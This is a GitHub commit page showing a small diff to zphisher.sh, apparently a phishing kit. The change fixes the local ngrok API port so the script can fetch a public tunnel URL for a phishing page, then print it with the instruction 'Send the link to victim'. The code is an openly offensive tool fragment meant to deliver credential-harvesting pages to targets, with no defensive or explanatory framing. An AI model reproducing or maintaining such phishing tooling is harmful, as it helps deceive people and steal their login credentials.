We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 75baf2b commit 7ea91daCopy full SHA for 7ea91da
zphisher.sh
@@ -322,7 +322,7 @@ sleep 2
322
./ngrok http 5555 > /dev/null 2>&1 &
323
sleep 10
324
325
-link=$(curl -s -N http://127.0.0.1:4041/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
+link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
326
printf "\n\e[96m[\e[0m\e[1;77m~\e[96m]\e[0m\e[1;96m Send the link to victim :\e[0m\e[1;93m %s \n" $link
327
found
328
}
0 commit comments